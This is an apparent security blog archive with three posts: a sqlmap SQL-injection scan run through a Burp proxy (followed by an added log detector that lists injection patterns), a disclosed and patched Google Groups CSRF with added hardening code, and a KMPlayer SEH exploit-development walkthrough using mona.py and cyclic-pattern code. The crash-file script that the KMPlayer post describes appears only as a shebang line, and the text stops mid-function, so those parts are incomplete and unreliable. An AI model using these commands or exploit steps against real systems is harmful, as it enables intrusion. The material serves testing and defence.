Somehow my friend didn't manage to get sqlmap working with the <span style="background-color: #999999;">--proxy</span> switch, so I decided to try it out myself.<br />
<br />
The first thing I did was to read the sqlmap documentation about the <span style="background-color: #999999;">--proxy</span> switch.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-X1yiBgrmG0w/Tm2--IZFfGI/AAAAAAAAAYg/TJYSHYpdMwc/s1600/sqlmap-proxy.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="http://1.bp.blogspot.com/-X1yiBgrmG0w/Tm2--IZFfGI/AAAAAAAAAYg/TJYSHYpdMwc/s400/sqlmap-proxy.jpeg" width="400" /></a></div>
<br />
It's pretty straightforward to use the --proxy switch: you just need to provide the proxy details as http://&lt;proxy IP&gt;:&lt;port&gt;. I used Burp to test this.<br />
<br />
The target site was running on 192.168.20.129. It had a search page that was vulnerable to SQL injection, and that page used the POST method.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-pZM0dYbWNpM/Tm2--taxfqI/AAAAAAAAAYk/azdiIJggxmQ/s1600/target-site.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="http://1.bp.blogspot.com/-pZM0dYbWNpM/Tm2--taxfqI/AAAAAAAAAYk/azdiIJggxmQ/s400/target-site.jpeg" width="400" /></a></div>
<br />
To run sqlmap, I used the following command:<br />
<span style="background-color: #999999;">./sqlmap.py -u "https://192.168.20.128/1/index.jsp" --data "word=test" --proxy "http://127.0.0.1:8080"</span><br />
<br />
where -u is the target URL, --data is the POST data and --proxy is the Burp proxy address.<br />
<br />
Let's run it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-5qt7xNe-jlw/Tm2-802klAI/AAAAAAAAAYc/K1sreeoHw-g/s1600/sqlmap-in-action.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="http://4.bp.blogspot.com/-5qt7xNe-jlw/Tm2-802klAI/AAAAAAAAAYc/K1sreeoHw-g/s400/sqlmap-in-action.jpeg" width="400" /></a></div>
<br />
It works, and sqlmap detected the back-end database as MySQL 5.0.<br />
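<br />
Seen from the server side, the same scan leaves traces that are worth knowing. The following is an added example, not part of the original post and not sqlmap's code: a small detector that runs over constructed access-log lines in the Apache/nginx "combined" format and flags sqlmap's default User-Agent (which starts with "sqlmap/") as well as injection markers in the request line. The log lines, IP addresses and the sqlmap version string are constructed; the --user-agent and --random-agent switches mentioned in the comments are real sqlmap options.<br />

```python
"""Flag sqlmap-style traffic in a web server access log.

Added example for this post (not part of the original, not sqlmap code):
the scan the post sends through Burp looks like ordinary HTTPS traffic on
the wire, but the web server still logs it. The detector below runs over
constructed lines in the Apache/nginx "combined" format and flags
(1) sqlmap's default User-Agent, which starts with "sqlmap/", and
(2) injection markers in the request line, since --user-agent or
--random-agent replace the first signal. POST bodies (the post's
--data "word=test") never reach an access log, so for a POST-only scan
the User-Agent is the only trace visible here.
"""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote_plus

COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Patterns matched against the URL-decoded request line.
INJECTION_MARKERS = [
    re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),        # UNION ALL SELECT NULL,...
    re.compile(r"\b(and|or)\b\s*\d+\s*=\s*\d+", re.I),      # boolean tests: AND 1=1 / OR 7=7
    re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I),  # time-based tests
    re.compile(r"'\s*(and|or)\b", re.I),                    # quote break followed by a condition
]

# Constructed sample lines, modelled on the post's target (/1/index.jsp).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2011:10:41:02 -0700] "POST /1/index.jsp HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.5 - - [12/Sep/2011:10:41:03 -0700] "GET /1/index.jsp?word=test%27%20AND%201%3D1--%20 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [12/Sep/2011:10:42:10 -0700] "GET /1/index.jsp?word=security HTTP/1.1" 200 480 "-" "Mozilla/5.0 (Windows NT 6.1)"
10.0.0.5 - - [12/Sep/2011:10:41:04 -0700] "GET /1/index.jsp?word=test%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""


def classify(line: str) -> List[Dict[str, str]]:
    """Return zero or more findings for one access-log line."""
    m = COMBINED.match(line)
    if not m:
        return []  # not combined format; skip rather than guess
    findings = []
    ua, req = m.group("ua"), unquote_plus(m.group("req"))
    if ua.lower().startswith("sqlmap/"):
        findings.append({"ip": m.group("ip"), "kind": "user-agent", "detail": ua})
    for pattern in INJECTION_MARKERS:
        hit = pattern.search(req)
        if hit:
            findings.append({"ip": m.group("ip"), "kind": "payload", "detail": hit.group(0)})
            break  # one payload finding per line is enough
    return findings


def scan_log(text: str) -> List[Dict[str, str]]:
    """Run classify() over every non-empty line of an access log."""
    return [f for line in text.splitlines() if line.strip() for f in classify(line)]


def suspicious_ips(findings: List[Dict[str, str]]) -> Counter:
    """Count findings per client IP; a source with several hits deserves a closer look."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f["ip"], f["kind"], f["detail"])
    print(suspicious_ips(hits))
```

On the constructed log, the benign search from 10.0.0.9 is left alone while the three requests from 10.0.0.5 are flagged, one by User-Agent and two by payload. Running the scan through Burp does not change any of this: the proxy only terminates TLS on the tester's side, and the requests reach the server unchanged.<br />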
<br />
Hope you will find this useful.</div>
AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com8tag:blogger.com,1999:blog-1544325078740292092.post-29365100037363691442011-07-28T22:56:00.000-07:002011-07-28T22:56:09.475-07:00Google Groups Profile CSRF<div dir="ltr" style="text-align: left;" trbidi="on">The Google Groups profile page was vulnerable to a CSRF attack that deleted the profile picture of an authenticated user. A simple GET request to <a href="http://groups.google.com/groups/profile/addphoto?Action.Delete=1">http://groups.google.com/groups/profile/addphoto?Action.Delete=1</a> would delete the user's current profile picture without his/her knowledge. This was possible due to the absence of anti-CSRF measures.<br />
<br />
This vulnerability has since been patched by Google. Here are the snapshots of the vulnerability in action.<br />
<br />
Before the exploitation:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wWe686sD0_I/TjJKE3a_suI/AAAAAAAAAX0/ki-oiXTfzpQ/s1600/new-poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="http://2.bp.blogspot.com/-wWe686sD0_I/TjJKE3a_suI/AAAAAAAAAX0/ki-oiXTfzpQ/s400/new-poc1.JPG" width="400" /></a></div><br />
After CSRF exploitation:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-H5x4gA7uNDE/TjJKFNm4V3I/AAAAAAAAAX4/yZDHPWsvQGw/s1600/new-poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://3.bp.blogspot.com/-H5x4gA7uNDE/TjJKFNm4V3I/AAAAAAAAAX4/yZDHPWsvQGw/s400/new-poc2.JPG" width="400" /></a></div><br />
<br />
<br />
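The fix for this class of bug is well understood, and it is worth seeing the vulnerable shape next to the hardened one. The following is an added example, not Google's code: a minimal handler in the vulnerable form (any method, only the cookie and <i>Action.Delete=1</i> matter) beside a hardened form that refuses state changes over GET and requires a synchronizer token bound to the session with an HMAC. The <i>Request</i> class, the handler names, the session cookie value and the server key are constructed for this example.<br />

```python
"""Synchronizer-token CSRF guard for a state-changing endpoint.

Added example (not Google's code): the profile-photo deletion above went
through because a plain GET carrying Action.Delete=1 was enough, and the
browser attached the victim's session cookie automatically. The vulnerable
shape is shown beside a hardened handler that (1) refuses state changes
over GET and (2) demands a per-session token that a page on another
origin cannot read. The Request class, the handler names and the session
values are constructed for this example.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, Set, Tuple

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret, generated here for the demo


@dataclass
class Request:
    """The parts of an HTTP request the handlers look at."""
    method: str
    query: Dict[str, str] = field(default_factory=dict)   # URL parameters
    form: Dict[str, str] = field(default_factory=dict)    # POST body fields
    session_id: str = ""                                   # session cookie sent by the browser


def csrf_token_for(session_id: str) -> str:
    """Derive the token from the session id, so nothing extra is stored server-side.

    The application embeds this value in its own forms. A page on another
    origin cannot read it (same-origin policy), so it cannot forge a valid request.
    """
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def delete_photo_vulnerable(req: Request, sessions: Set[str], photos: Dict[str, str]) -> Tuple[int, str]:
    """Vulnerable shape: any method, any origin; only the cookie and Action.Delete=1 matter."""
    if req.session_id not in sessions:
        return 401, "not logged in"
    params = {**req.query, **req.form}
    if params.get("Action.Delete") == "1":
        photos.pop(req.session_id, None)
        return 200, "photo deleted"
    return 200, "nothing to do"


def delete_photo_hardened(req: Request, sessions: Set[str], photos: Dict[str, str]) -> Tuple[int, str]:
    """Hardened: POST only, and the form must carry the token bound to this session."""
    if req.method != "POST":
        return 405, "state changes are not accepted over GET"
    if req.session_id not in sessions:
        return 401, "not logged in"
    expected = csrf_token_for(req.session_id).encode()
    supplied = req.form.get("csrf_token", "").encode()
    if not hmac.compare_digest(expected, supplied):   # constant-time comparison
        return 403, "missing or invalid CSRF token"
    if req.form.get("Action.Delete") == "1":
        photos.pop(req.session_id, None)
        return 200, "photo deleted"
    return 200, "nothing to do"


def demo() -> Dict[str, Tuple[int, bool]]:
    """Replay forged and legitimate requests; each result is (status, photo_still_there)."""
    victim = "sess-victim-1234"   # constructed session cookie value

    def run(handler: Callable, req: Request) -> Tuple[int, bool]:
        sessions, photos = {victim}, {victim: "me.jpg"}   # fresh state for every case
        status, _ = handler(req, sessions, photos)
        return status, victim in photos

    # The forged GET from the post: the browser adds the cookie, nothing else is needed.
    forged_get = Request("GET", query={"Action.Delete": "1"}, session_id=victim)
    # A forged POST without the token, e.g. from a form on another origin.
    forged_post = Request("POST", form={"Action.Delete": "1"}, session_id=victim)
    # The legitimate request from the application's own form, which carries the token.
    legit = Request("POST", form={"Action.Delete": "1", "csrf_token": csrf_token_for(victim)},
                    session_id=victim)
    return {
        "vulnerable / forged GET": run(delete_photo_vulnerable, forged_get),
        "hardened / forged GET": run(delete_photo_hardened, forged_get),
        "hardened / forged POST": run(delete_photo_hardened, forged_post),
        "hardened / legitimate POST": run(delete_photo_hardened, legit),
    }


if __name__ == "__main__":
    for case, (status, still_there) in demo().items():
        print("%-28s -> HTTP %d, photo %s" % (case, status, "kept" if still_there else "deleted"))
```

The method check alone would have stopped the GET described in the post, but it is the token that stops the equally easy forged POST; the two belong together. Marking the session cookie SameSite is a further layer, not a replacement, since it depends on browser support.<br />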
</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com0tag:blogger.com,1999:blog-1544325078740292092.post-51702214197509226612011-06-30T00:49:00.000-07:002011-06-30T00:49:01.589-07:00Exploit Development with mona.py<!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Mona.py is plug-in for Immunity Debugger which is developed by <a href="https://www.corelan.be/">Corelan Team</a>. It is a successor of pvefindaddr which is retired after the release of mona.py. </div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">You can find more information about mona.py <a href="https://www.corelan.be/index.php/2011/06/16/mona-1-0-released/">here</a>, along with <a href="http://redmine.corelan.be/projects/mona">installation</a> and <a href="http://redmine.corelan.be/projects/mona/wiki">usage</a> instructions.</div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">While testing buffer overflow exploits for “The KMPlayer 3.0.0.1440” (exploits <a href="http://www.exploit-db.com/exploits/17364">here</a> & <a href="http://www.exploit-db.com/exploits/17383">here</a>), I noticed that it is vulnerable to SEH exploitation as well.</div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Here is how I crafted a Metasploit module using !mona in only 3 steps.</div><div class="MsoNormal"><br />
</div><div class="MsoListParagraph" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;"><b>1. Identify SEH Overflow</b></div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">According to the exploits reported at <a href="http://www.exploit-db.com/">www.exploit-db.com</a>, KMPlayer is vulnerable to a buffer overflow when supplied with a specially crafted MP3 file.</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;"><br />
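What step 1 boils down to once the crafted file crashes the player under the debugger, as an added example that is not code from this post: a Metasploit/mona-style cyclic pattern (what `!mona pattern_create` and `!mona findmsp` automate) and the lookup that maps the DWORDs found in the nSEH and SEH fields back to offsets in the input. The 5000-byte buffer and the record offset 1024 are constructed values.

```python
"""Cyclic pattern and offset lookup for triaging an SEH overwrite.

Added example, not code from the original post. It reproduces the
Metasploit/mona pattern (what `!mona pattern_create` and `!mona findmsp`
automate) so the reader can see how a crash value maps to an offset.
"""
import string
import struct

# Metasploit-style pattern: one upper-case, one lower-case, one digit,
# cycling fastest on the digit, e.g. Aa0Aa1Aa2...Aa9Ab0...  Every 4-byte
# window is unique over the full 26*26*10*3 = 20280-byte pattern.
MAX_PATTERN = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern."""
    if length > MAX_PATTERN:
        raise ValueError("pattern repeats beyond %d bytes" % MAX_PATTERN)
    triplets = (up + lo + dg for up in string.ascii_uppercase
                for lo in string.ascii_lowercase for dg in string.digits)
    return "".join(triplets)[:length].encode("ascii")


def has_unique_dwords(pat):
    """True if no 4-byte window occurs twice in `pat`, which is what makes
    the offset lookup unambiguous (and why the length is capped)."""
    windows = [pat[i:i + 4] for i in range(len(pat) - 3)]
    return len(windows) == len(set(windows))


def pattern_offset(value, length=MAX_PATTERN):
    """Map a crash value back to its offset in the pattern.

    `value` is either the 4 raw bytes or the DWORD as the debugger shows it
    in a register or SEH field. x86 is little-endian, so a field showing
    0x41306141 holds the bytes b"Aa0A" in memory. Returns None if absent."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def simulate_seh_overwrite(buf, record_offset):
    """Constructed stand-in for the crash: pretend `buf` was copied over the
    stack and the SEH record (nSEH pointer followed by the handler pointer)
    started `record_offset` bytes in; return the two DWORDs the debugger
    would display for that record."""
    nseh = struct.unpack("<I", buf[record_offset:record_offset + 4])[0]
    seh = struct.unpack("<I", buf[record_offset + 4:record_offset + 8])[0]
    return nseh, seh


def triage_seh(nseh_value, seh_value, length=MAX_PATTERN):
    """Given the nSEH and SEH handler DWORDs seen after the crash, return
    the input offsets that landed in each field and whether the two are
    adjacent, i.e. one contiguous copy of the input overwrote the record
    (the SEH record offset that `!mona findmsp` reports)."""
    nseh_off = pattern_offset(nseh_value, length)
    seh_off = pattern_offset(seh_value, length)
    contiguous = (nseh_off is not None and seh_off is not None
                  and seh_off == nseh_off + 4)
    return {"nseh_offset": nseh_off, "seh_offset": seh_off,
            "contiguous": contiguous}


if __name__ == "__main__":
    # Constructed scenario: a 5000-byte pattern lands on the stack and the
    # SEH record happens to sit 1024 bytes into it.
    buf = pattern_create(5000)
    nseh, seh = simulate_seh_overwrite(buf, 1024)
    print("nSEH=0x%08x SEH=0x%08x" % (nseh, seh))
    print(triage_seh(nseh, seh))
```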
</div><div class="MsoNormal" style="text-align: justify;">Let's create an MP3 file.</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">#!C:/Python27/python.exe</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191;"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">The above script creates an MP3 file named “kmp_crash.mp3” whose content is the fixed header followed by 5000 “A”s (0x41 bytes). The header is written exactly as captured; only the length of the trailing field is what makes the file differ from a benign one.</div><br />
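<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Once a uniform run of “A”s crashes the player, the next thing a practitioner wants is the offset inside that run that actually lands in the crashing register. The usual trick is to replace the “A”s with a non-repeating cyclic pattern (the Metasploit pattern_create / pattern_offset idea) and read the register value back from the debugger. The Python 3 script below is an added example and not part of the original post or of any tool it uses: pattern_create, pattern_offset, offset_from_register, build_payload and write_crash_file are helpers written here, and SAMPLE_HEADER is a short constructed stand-in for the full header in the script above (paste the real header bytes in its place before using it against the player).</div>

```python
#!/usr/bin/env python3
"""Added example: build the crash file with a cyclic pattern instead of
5000 "A"s, then map a register value seen in the debugger to a file offset."""
import itertools
import string

# Constructed stand-in for the long header in the script above; substitute
# the real bytes (the first 16 bytes here are copied from that header).
SAMPLE_HEADER = b"\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00"

# Metasploit-style pattern: every Upper/lower/digit triple is unique, so any
# 4-byte window occurs at exactly one offset as long as the pattern is not
# longer than 26 * 26 * 10 triples.
MAX_PATTERN_LEN = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern Aa0Aa1Aa2...Ab0Ab1..."""
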